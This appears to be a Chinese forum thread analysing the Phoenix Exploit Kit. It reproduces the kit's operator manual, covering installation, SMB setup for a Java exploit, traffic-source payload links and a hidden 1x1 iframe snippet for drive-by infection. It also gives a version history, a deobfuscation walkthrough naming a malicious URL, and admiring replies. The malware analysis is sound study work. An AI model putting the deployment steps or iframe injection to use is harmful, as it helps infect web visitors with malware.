国外网马探秘 - Phoenix Exploit Kit

是昔流芳

此主题分为两部分:
1. Phoenix Exploit Kit 简介
2. Phoenix Exploit Kit 混淆部分还原.
3. Phoenix Exploit Kit 部署过程.

是昔流芳

===========System requirments=============

You need to have following software installed on your server:

1)PHP5

2)MySQL

3)SMB on port 445 (it's possible to install SMB on other server not necessary on the server where exploit's kit itself is installed)

=====================Installing Phoenix Exploits Kit======================

1)Upload install.php to any dir on your server

2)Chmod 777 on that dir

3)Run install.php using browser's address bar and follow instructions shown on the screen

=====================Configuring SMB notes=========================

To make JAVA SMB exploit working you need to have installed SMB on your server:

  ?Install SMB on 445 port
  ?Copy new.avi file from this archive to home/smb dir on your smb server
  ?Edit smb config as shown above:
  
  [global]
  security = share
  [smb]
  comment = smb
  path = /home/smb
  public = yes
  browseable = no
  writeable = no
  guest ok = yes

  To check smb work exec following command: /etc/rc.d/init.d/smb restart

  If we get result showed above:
  
  Shutting down SMB services:                                [  OK  ]
  Shutting down NMB services:                                [  OK  ]
  Starting SMB services:                                     [  OK  ]
  Starting NMB services:                                     [  OK  ]

  then that mean's that everything's all right and SMB installed correctly.

  To check if 445 port is opened use folowing service: http://ping.eu/port-chk/

  As a result we get smb path: \\\\\\\\domain\\\smb\\\new.avi (write "\" char exactly as it showed 8 "\" domain 3 "\" dir 4 "\" file )
  
  If you don't want to install and configure SM yourself then you can use SMB path from author:
  
  1)I can supply and can not supply you SMB path so it's up to me.
  
  2)I do not have any responsibility for my smb host. If it's down and JAVA SMB exploit is not working for you then it's not my problem, it's yours.

==================================Subaccounts==================================

link_for_traffic.php?n=source_name => source_name.exe from dir of exploit's kit
source_name - any latin chars and digits. (a-b, 0-9).

Statistics for traffics seller: statistics_file.php?n=source_name

==================================Change mode==================================

You can switch JAVA exploit between JAVA TC, JAVA RMI, JAVA MIDI.
Which exploit is better depends from traffic, so you need to find it out yourself testing exploit in different modes with your kind of traffics.
You are able to set mode during installation process or switch it any time you want from admin cp.



==========================Sample of correct iframe=============================

<iframe src="http://domain.com/phx/index.php" width="1" height="1" frameborder="0"></iframe>

if you use any other kind of iframe then take a look on it, FireFox infection rate can be 0.

仍待完善...

我是一个坏人

太深奥了  看不懂啊  努力学习啊

九零-鑫鑫

大牛！ 小菜鸟前来膜拜

Mrxn

不错的帖子

jacklotus

似乎没看懂

zzzzyy

神啊，这个得认真学习，多谢

少年好学

谢谢楼主分享！！！！

lida_123

支持大牛啊……

混小子

我记得 凤是雌的，凰才是雄的

是昔流芳

Phoenix是凤凰的意思,这一点也在PEK的登录界面有所体现.

提起凤凰,我最先想到的是邓布利多养的那只(条,头,个?).眼泪能治病,还能吞魔咒,送信,当飞行工具,很万能.
在中华文化中,凤凰是百鸟之王.凤凰和朋友,贫穷一样,是合成词.雄为凤,雌为凰(所以说龙凤呈祥啊,一片大雾).
据《山海经·山经·南山经》,又东五百里,曰丹穴之山,其上多金玉.丹水出焉,而南流注于渤海.有鸟焉,其状如鸡,五采而文,名曰凤皇,首文曰德,翼文曰义,背文曰礼,膺文曰仁,腹文曰信.是鸟也,饮食自然,自歌自舞,见则天下安宁.

好了,闲扯完了.
下面简述一下PEK的更新历程.
Phoenix Exploit Kit v3.0(2011年年底放出,最新版本)
Phoenix Exploit Kit v2.8 Mini
Phoenix Exploit Kit v2.7
Phoenix Exploit Kit v2.5(已泄露)
Phoenix Exploit Kit v2.4
Phoenix Exploit Kit v2.3r(略修正,8月放出)
Phoenix Exploit Kit v2.3(2010年6月放出,一份授权2200美元.该版本使PDF漏洞的触发可以绕过ASLR和DEP.)
Phoenix Exploit Kit v2.21
Phoenix Exploit Kit v2.2(增加了对Firefox,Opera和Safari的支持)
Phoenix Exploit Kit v2.1
Phoenix Exploit Kit v2.0(这个改动很大,所以直接跳版本号了)
Phoenix Exploit Kit v1.4(增加了对Chrome的支持)
Phoenix Exploit Kit v1.31
Phoenix Exploit Kit v1.3
Phoenix Exploit Kit v1.2
Phoenix Exploit Kit v1.0
Phoenix Exploit Kit v1.0 BETA
每一次的更新都承接了以前的漏洞支持,并添加了新的漏洞支持.
这一次就以Phoenix Exploit Kit v3.0为例进行反混淆.

是昔流芳

例子: http://horoshovsebudet.ru:8080/html/yveveqduclirb1.php?n=putty
主页代码: http://pastebin.com/6Y7avW19
可以看出,其中嵌入了两个PDF,将其下载下来.
使用PDFStreamDumper载入PDF.

找到有用的数据流,复制到malzilla中.

之后就十分简单了.
使用AS3 Sorcerer打开Flash文件,可以看到其中构造的Shellcode.

注意,这段代码是经过翻转的,需要还原.

这里使用malzilla得到其中的地址.

willJ

果断前来支持芳芳牛，不错的东西呀

sorataxx

也来支持小芳一下下 ^_^

为毛还要验证问答

virusdefender

支持你啊，网马解密能否像脱壳一样，有没有一个软件，代码解密后再“dump”出来啊？

LBD

不错，支持大牛

faqe

支持大牛